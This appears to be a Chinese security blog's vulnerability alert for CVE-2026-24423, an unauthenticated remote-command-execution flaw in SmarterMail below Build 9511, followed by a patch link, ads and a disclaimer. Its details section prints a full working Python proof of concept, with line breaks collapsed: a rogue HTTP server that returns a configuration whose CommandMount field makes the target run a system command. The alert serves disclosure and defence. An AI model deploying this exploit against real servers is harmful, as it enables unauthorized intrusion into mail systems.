文章总结: SmarterMail存在CVE-2026-24423高危RCE漏洞,源于ConnectToHubAPI未认证访问。攻击者可诱导服务器指向恶意服务端并执行系统命令,影响Build9511以下版本。目前PoC已公开,建议受影响用户尽快升级至最新版本进行修复,并排查是否遭受攻击。 综合评分: 80 文章分类: 漏洞预警,漏洞POC,WEB安全
漏洞速递 | CVE-2026-24423 RCE漏洞(建议自查)
渗透Xiao白帽
2026年2月6日 10:22 北京
0x01 前言
SmarterMail是一款由SmarterTools公司开发的基于Windows平台的邮件服务器软件,专为中小型企业、教育机构及需要私有化部署的组织设计,提供完整的邮件通信解决方案。其核心定位是作为Microsoft Exchange的轻量级替代方案,无需依赖Active Directory,漏洞源于ConnectToHub API接口未对访问者进行身份认证。攻击者可通过构造特定请求,诱导SmarterMail服务器指向恶意HTTP服务器,进而向 SmarterMail返回恶意操作系统命令。鉴于该漏洞影响范围较大,建议尽快做好自查及防护。
0x02 漏洞等级
高危
0x03 漏洞影响
SmarterMail < Build 9511
0x04 漏洞详情
PoC已公布:
https://github.com/aavamin/CVE-2026-24423
#!/usr/bin/env python3from http.server import BaseHTTPRequestHandler, HTTPServerimport json
class Handler(BaseHTTPRequestHandler): def _send_json(self, code: int, obj: dict): data = json.dumps(obj).encode("utf-8") self.send_response(code) self.send_header("Content-Type", "application/json") self.send_header("Content-Length", str(len(data))) self.end_headers() self.wfile.write(data)
def do_POST(self): if self.path != "/web/api/node-management/setup-initial-connection": self._send_json(404, {"error": "not found", "path": self.path}) return
length = int(self.headers.get("Content-Length", "0")) body = self.rfile.read(length).decode("utf-8", errors="replace") print("[*] Received POST:", self.path) print("[*] Body:", body)
resp = { "ClusterID": "f0e12780-f462-4b51-a7db-149f1d56209c", "SharedSecret": "any-value", "TargetHubs": {"a": "b"}, "IsStandby": False, "SystemMount": { "Enabled": True, "ReadOnly": False, "MountPath": "C:\\\\", "CommandMount": "whoami > C:\\\\whoami.txt" }, "SystemAdminUsernames": ["admin"] } self._send_json(200, resp)
def main(): host = "0.0.0.0" port = 80 print(f"Serving on http://{host}:{port}") HTTPServer((host, port), Handler).serve_forever()
if __name__ == "__main__": main()#Powered by ChatGPT
0x05 修复建议
官方已发布安全补丁,请及时更新至最新版本:
https://www.smartertools.com/smartermail/downloads
网 安 考 证
需要考各类安全证书的可以扫码找我咨询,价格优惠、活动划算!
报名CISSP、CCSP、PTE、PTS、IRE、IRS、DSG、CCSK、CDSP、CZTP、ITIL4等符合活动标准的认证课程。
往期推荐 · 有彩蛋
【内网渗透】内网信息收集命令汇总
【内网渗透】域内信息收集命令汇总
【超详细 | Python】CS免杀-Shellcode Loader原理(python)
【超详细 | Python】CS免杀-分离+混淆免杀思路
【超详细 | 钟馗之眼】ZoomEye-python命令行的使用
【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现
【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现
【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞
【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现
【奇淫巧技】如何成为一个合格的“FOFA”工程师
【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】
【超详细】Fastjson1.2.24反序列化漏洞复现
记一次HW实战笔记 | 艰难的提权爬坑
走过路过的大佬们留个关注再走呗
往期文章有彩蛋哦
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:渗透Xiao白帽 《漏洞速递 | CVE-2026-24423 RCE漏洞(建议自查)》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论